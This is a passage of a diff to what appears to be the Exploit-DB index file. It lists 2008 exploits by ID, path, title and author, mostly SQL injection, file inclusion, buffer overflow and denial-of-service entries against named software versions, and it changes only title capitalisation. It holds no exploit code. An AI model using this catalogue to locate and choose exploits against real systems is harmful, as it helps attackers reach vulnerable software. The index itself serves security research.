Injection",2008-05-17,"CWH Underground",php,webapps,0 +5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Blind SQL Injection",2008-05-17,His0k4,php,webapps,0 5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion Exploit",2008-05-17,0in,php,webapps,0 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 @@ -5277,7 +5277,7 @@ id,file,description,date,author,platform,type,port 5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 -5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0 +5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0 5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps,0 5654,platforms/php/webapps/5654.txt,"EntertainmentScript - (play.php id) SQL Injection",2008-05-19,Mr.SQL,php,webapps,0 5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 @@ -5314,7 +5314,7 @@ id,file,description,date,author,platform,type,port 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service PoC",2008-05-29,securfrog,windows,dos,0 5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0 -5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion (Windows)",2008-05-29,gmda,php,webapps,0 +5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - (fckeditor) Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0 @@ -5358,7 +5358,7 @@ id,file,description,date,author,platform,type,port 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX - Remote Download and Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0 -5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 +5736,platforms/php/webapps/5736.txt,"1Book GuestBook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 @@ -5413,7 +5413,7 @@ id,file,description,date,author,platform,type,port 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 -5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 +5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote Buffer Overflow Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 @@ -5451,7 +5451,7 @@ id,file,description,date,author,platform,type,port 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 -5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 +5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - (lang) Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps,0 5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 @@ -5560,7 +5560,7 @@ id,file,description,date,author,platform,type,port 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 - SQL Injection",2008-06-25,His0k4,php,webapps,0 -5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 +5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,"CWH Underground",php,webapps,0 5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 @@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 -5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0 +5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 @@ -5656,9 +5656,9 @@ id,file,description,date,author,platform,type,port 6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 -6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 +6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 -6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 - Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 +6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution PoC",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 @@ -5675,7 +5675,7 @@ id,file,description,date,author,platform,type,port 6058,platforms/php/webapps/6058.txt,"Avlc Forum - (vlc_forum.php id) SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service",2008-07-13,Exodus,windows,dos,0 6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 -6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6061,platforms/php/webapps/6061.txt,"Maian GuestBook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 @@ -5713,7 +5713,7 @@ id,file,description,date,author,platform,type,port 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe - (folder.php id) SQL Injection",2008-07-18,n0ne,php,webapps,0 -6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow (Win32)",2008-07-18,Unohope,windows,remote,80 +6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows/x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 @@ -5730,7 +5730,7 @@ id,file,description,date,author,platform,type,port 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (Perl)",2008-07-22,"Guido Landi",windows,remote,0 -6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 +6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - (default.asp catid) SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 @@ -5740,7 +5740,7 @@ id,file,description,date,author,platform,type,port 6124,platforms/windows/remote/6124.c,"Microsoft Access - (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 -6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 +6127,platforms/php/webapps/6127.htm,"Wordpress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 @@ -5882,7 +5882,7 @@ id,file,description,date,author,platform,type,port 6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 - (templater.php) Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6291,platforms/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 -6292,platforms/php/webapps/6292.txt,"onenews beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 +6292,platforms/php/webapps/6292.txt,"onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i - Mms Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 6294,platforms/php/webapps/6294.txt,"5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,php,webapps,0 @@ -5951,7 +5951,7 @@ id,file,description,date,author,platform,type,port 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote Buffer Overflow Exploit",2008-09-05,SVRT,windows,remote,0 -6368,platforms/php/webapps/6368.php,"AWStats Totals - (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 +6368,platforms/php/webapps/6368.php,"AWStats Totals - (AWStatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - (index.php id) Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 @@ -5973,12 +5973,12 @@ id,file,description,date,author,platform,type,port 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .M3U File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0 6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service",2008-09-06,LiquidWorm,windows,dos,0 -6392,platforms/php/webapps/6392.php,"Simple Machines Forum 1.1.5 - Admin Reset Password Exploit (Win32)",2008-09-06,Raz0r,php,webapps,0 +6392,platforms/php/webapps/6392.php,"Simple Machines Forum 1.1.5 (Windows/x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service PoC",2008-09-07,"Alex Hernandez",hardware,dos,0 6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0 -6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 +6397,platforms/php/webapps/6397.txt,"Wordpress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - (search_results.php) SQL Injection",2008-09-07,Mormoroth,php,webapps,0 6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0 @@ -5998,7 +5998,7 @@ id,file,description,date,author,platform,type,port 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script - (jid) SQL Injection (Auth)",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 -6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 +6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - (page) SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",windows,dos,0 @@ -6031,8 +6031,8 @@ id,file,description,date,author,platform,type,port 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - (link.php) SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 -6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 -6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 +6456,platforms/php/webapps/6456.txt,"Free PHP VX GuestBook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 +6457,platforms/php/webapps/6457.txt,"Free PHP VX GuestBook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 @@ -6148,9 +6148,9 @@ id,file,description,date,author,platform,type,port 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0 6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 -6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - (go.php id) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6578,platforms/php/webapps/6578.txt,"212cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 @@ -6194,7 +6194,7 @@ id,file,description,date,author,platform,type,port 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) SQL Injection",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 -6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 +6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 6624,platforms/php/webapps/6624.txt,"Arcadem Pro - (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0 @@ -6258,7 +6258,7 @@ id,file,description,date,author,platform,type,port 6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0 6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 -6690,platforms/windows/remote/6690.html,"Skype extension for Firefox BETA 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0 +6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0 6691,platforms/php/webapps/6691.txt,"yerba sacphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0 6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 - (COOKIE) SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 @@ -6344,7 +6344,7 @@ id,file,description,date,author,platform,type,port 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 -6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - (stnl_iframe.php) SQL Injection",2008-10-17,r45c4l,php,webapps,0 +6777,platforms/php/webapps/6777.txt,"Wordpress Plugin st_newsletter - (stnl_iframe.php) SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty - (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 @@ -6381,7 +6381,7 @@ id,file,description,date,author,platform,type,port 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution PoC",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 -6816,platforms/php/webapps/6816.txt,"txtshop 1.0b - (language) Local File Inclusion (Windows)",2008-10-23,Pepelux,php,webapps,0 +6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - (language) Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 @@ -6391,7 +6391,7 @@ id,file,description,date,author,platform,type,port 6823,platforms/php/webapps/6823.txt,"siteengine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution 